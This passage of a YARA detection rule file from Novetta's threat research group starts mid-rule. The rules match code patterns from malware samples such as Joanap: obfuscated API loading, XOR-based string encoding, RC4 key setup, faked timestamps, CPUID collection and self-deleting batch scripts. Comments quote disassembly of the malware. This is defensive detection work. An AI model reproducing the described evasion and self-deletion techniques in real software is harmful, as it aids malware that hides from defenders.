} condition: $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } rule DynamicAPILoading: sharedcode { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "eff542ac8e37db48821cb4e5a7d95c044fff27557763de3a891b40ebeb52cc55.ex_" strings: /* 83 C4 04 add esp, 4 50 push eax ; lpProcName 56 push esi ; hModule FF 15 20 F0 40 00 call ds:GetProcAddress 68 A8 0C 41 00 push offset aLo_adlIbr_arYw; "Lo.adL ibr.ar yW" A3 DC 3E 41 00 mov GetProcAddress_0, eax E8 7D FF FF FF call CleanupString 83 C4 04 add esp, 4 50 push eax ; _DWORD 56 push esi ; _DWORD FF 15 DC 3E 41 00 call GetProcAddress_0 68 94 0C 41 00 push offset aLoad_LibR_arYa; "Load. Lib r.ar yA" A3 D4 3E 41 00 mov LoadLibraryW, eax E8 63 FF FF FF call CleanupString 83 C4 04 add esp, 4 50 push eax ; _DWORD 56 push esi ; _DWORD FF 15 DC 3E 41 00 call GetProcAddress_0 68 80 0C 41 00 push offset a_frE_eliBr_arY; ".Fr e.eLi br.ar y" A3 D8 3E 41 00 mov LoadLibraryA_0, eax E8 49 FF FF FF call CleanupString */ $a = { 83 C4 ?? 5? 5? FF 15 [4] 68 [4] A3 [4] E8 [4] 83 C4 ?? 5? 5? FF 15 [4] 68 [4] A3 [4] E8 [4] 83 C4 ?? 5? 5? 
FF 15 [4] 68 [4] A3 [4] E8} condition: $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } rule DNSCalcStyleEncodeAndDecode: sharedcode { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "975522bc3e07f7aa2c4a5457e6cc16c49a148b9f731134b8971983225835577e" strings: /* 8A 10 mov dl, [eax] 80 F2 73 xor dl, 73h <--- for decoding and encoding, this and 80 EA 3A sub dl, 3Ah <--- this could be reversed, but the sig holds since both are 0x80 88 10 mov [eax], dl 40 inc eax 49 dec ecx 75 F2 jnz short loc_1000403C */ $a = {8A ?? 80 ?? ?? 80 ?? ?? 88 ?? 4? 4? 75 ?? } condition: $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } rule GenerateTLSClientHelloPacket_Test: sharedcode { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "eff542ac8e37db48821cb4e5a7d95c044fff27557763de3a891b40ebeb52cc55.ex_" strings: /* 25 07 00 00 80 and eax, 80000007h 79 05 jns short loc_405EC8; um, nope.. this will always happen 48 dec eax 83 C8 F8 or eax, 0FFFFFFF8h 40 inc eax */ $a = {25 07 00 00 80 79 ?? 4? 83 ?? F8 4? 
} condition: $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } rule RC4SboxKeyGen: sharedcode { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "RT_RCDATA_101.bin.bin" strings: /* 8A 4C 04 08 mov cl, [esp+eax+108h+sbox]; cl = sbox[i] 8B D0 mov edx, eax 81 E2 0F 00 00 80 and edx, 8000000Fh ; i % 16 79 05 jns short loc_10003AC8; dl = key[i & 16] 4A dec edx 83 CA F0 or edx, 0FFFFFFF0h 42 inc edx */ $a = { 8A [3] 8B ?? 81 ?? 0F 00 00 80 79 ?? 4? 83 ?? F0 4? } condition: $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } rule RandomTimestampGenerator: sharedcode { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "RT_RCDATA_101.bin.bin joanap baseline sample" strings: /* 66 81 44 24 0C FE FF add [esp+1Ch+SystemTime.wYear], 0FFFEh FF D6 call esi ; rand 99 cdq B9 0C 00 00 00 mov ecx, 0Ch F7 F9 idiv ecx 42 inc edx 66 89 54 24 0E mov [esp+1Ch+SystemTime.wMonth], dx FF D6 call esi ; rand 99 cdq B9 1C 00 00 00 mov ecx, 1Ch F7 F9 idiv ecx 42 inc edx 66 89 54 24 12 mov [esp+1Ch+SystemTime.wDay], dx FF D6 call esi ; rand 99 cdq B9 17 00 00 00 mov ecx, 17h F7 F9 idiv ecx 42 inc edx 66 89 54 24 14 mov [esp+1Ch+SystemTime.wHour], dx FF D6 call esi ; rand 99 cdq B9 3B 00 00 00 mov ecx, 3Bh F7 F9 idiv ecx 42 inc edx 66 89 54 24 16 mov [esp+1Ch+SystemTime.wMinute], dx FF D6 call esi ; rand 99 cdq B9 3B 00 00 00 mov ecx, 3Bh F7 F9 idiv ecx */ $a = { 66 81 [3] FE FF FF [1-4] 99 B9 0C 00 00 00 F7 [1-4] 42 66 89 [3] FF D6 99 B9 1C 00 00 00 F7 [1-4] 42 66 89 [3] FF D6 99 B9 17 00 00 00 F7 [1-4] 42 66 89 [3] FF D6 99 B9 3B 00 00 00 F7 [1-4] 42 66 89 [3] FF D6 99 B9 3B 00 00 00 F7 } 
condition: $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } rule CPUInfoExtraction { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "Cmd10010_296fcc9d611ca1b8f8288192d6d854cf4072853010cc65cb0c7f958626999fbd.bin" strings: /* 68 00 00 00 80 push 80000000h ; a2 8B 02 mov eax, [edx] 8B 4A 04 mov ecx, [edx+4] 89 4C 24 10 mov [esp+2Ch+var_1C], ecx 8B 4A 08 mov ecx, [edx+8] 89 4C 24 14 mov [esp+2Ch+var_18], ecx 8B 4A 0C mov ecx, [edx+0Ch] 8D 54 24 1C lea edx, [esp+2Ch+var_10] 89 8E 70 03 00 00 mov [esi+370h], ecx 52 push edx ; a1 8B CE mov ecx, esi 89 86 6C 03 00 00 mov [esi+36Ch], eax E8 29 FF FF FF call GetCPUIDValues 8B C8 mov ecx, eax 8B 01 mov eax, [ecx] 3D 00 00 00 80 cmp eax, 80000000h 8B 51 04 mov edx, [ecx+4] */ $a = {68 00 00 00 80 8B ?? 8B ?? 04 89 [3] 8B ?? 08 89 [3] 8B ?? 0C 8D [3] 89 [5] 5? 8B ?? 89 [5] E8 [4] 8B ?? 8B ?? 3D 00 00 00 80 8B ?? 
04 } condition: $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } // yara sigs for detecting common suicide scripts rule SuicideScriptL1 { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" strings: $ = ":L1\ndel \"%s\"\nif exist \"%s\" goto L1\ndel \"%s\"\n" condition: any of them } rule SuicideScriptR1_Multi { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" strings: $ = "\" goto R1\ndel /a \"" $ = "\"\nif exist \"" $ = "@echo off\n:R1\ndel /a \"" condition: all of them } rule SuicideScriptR { // joanap, joanapCleaner meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" strings: $ = ":R\nIF NOT EXIST %s GOTO E\ndel /a %s\nGOTO R\n:E\ndel /a d.bat" condition: all of them }
